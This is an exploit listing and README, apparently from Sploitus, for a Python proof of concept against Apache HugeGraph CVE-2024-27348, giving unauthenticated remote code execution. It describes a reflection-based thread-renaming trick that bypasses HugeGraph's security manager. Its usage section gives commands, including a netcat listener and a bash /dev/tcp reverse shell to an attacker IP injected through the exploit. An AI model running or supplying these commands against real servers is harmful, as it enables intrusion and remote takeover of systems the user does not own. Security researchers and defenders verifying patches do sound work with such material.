Exploit for Improper Access Control in Apache Hugegraph CVE-2024-27348

Name: Exploit for Improper Access Control in Apache Hugegraph CVE-2024-27348
Rating: 5 (102 reviews)
2026-03-30 | CVSS 9.8
## https://sploitus.com/exploit?id=CEE028DE-8456-5515-BA5D-B9BC2352D5ED
# CVE-2024-27348: Apache HugeGraph RCE (Advanced Sandbox Bypass)

![Python 3.x](https://img.shields.io/badge/Python-3.x-blue.svg)
![Exploit](https://img.shields.io/badge/Exploit-RCE-red.svg)
![CVE](https://img.shields.io/badge/CVE-2024--27348-orange.svg)

An advanced, highly reliable Proof of Concept (PoC) exploit for **CVE-2024-27348** (Remote Code Execution in Apache HugeGraph Server). 

Unlike many public PoCs that execute commands blindly or fail on complex payloads due to Java's `Runtime.exec()` limitations, this script is designed for **reliability in real-world penetration testing scenarios**.

## ⚠️ Disclaimer
> **For Educational and Authorized Testing Purposes Only.**
> This tool is provided for security researchers, penetration testers, and system administrators to verify the vulnerability in authorized environments. The author is not responsible for any misuse or damage caused by this tool.

## ✨ Features & Technical Improvements

This exploit improves upon early public PoCs by addressing three critical issues:

1. **HugeSecurityManager Sandbox Bypass:** The HugeGraph sandbox blocks execution if the calling thread is named `gremlin-server-exec-*` or `task-worker-*`. This payload uses Java Reflection to dynamically rename the execution thread to `BypassThread` before triggering the payload, seamlessly evading the security manager.
2. **Complex Payload Handling:** Instead of `Runtime.getRuntime().exec(String)`, which breaks complex bash commands (like reverse shells) at spaces, this exploit uses `ProcessBuilder` with a properly formatted `List`. This allows for the safe execution of complex payloads with quotes and redirections.
3. **Full Output Reading (Non-Blind RCE):** The script reads the `InputStream` of the executed process using a Java `Scanner` and returns the actual output of the command in the JSON HTTP response. You see exactly what the server sees.

## ⚙️ Requirements

- Python 3.x
- `requests` library

Install the required dependencies:
```bash
pip3 install requests
```

## 🚀 Usage

```bash
python3 exploit.py -u  -c 
```

**Examples**
1. **Basic Command Execution (Reading output):**

```bash
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
```

2. **Spawning a Reverse Shell:**
Because the payload handles spaces and quotes correctly, you can inject a standard bash reverse shell directly without needing to base64-encode or stage it:

```bash
# On your attacker machine, start a listener:
nc -lvnp 4444

# Execute the exploit:
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
```

## 🔍 Vulnerability Details
Apache HugeGraph Server exposes a Gremlin API endpoint (/gremlin) that allows users to submit Groovy scripts. Due to insufficient sandboxing in versions prior to patching, an unauthenticated attacker can execute arbitrary operating system commands via Java Reflection.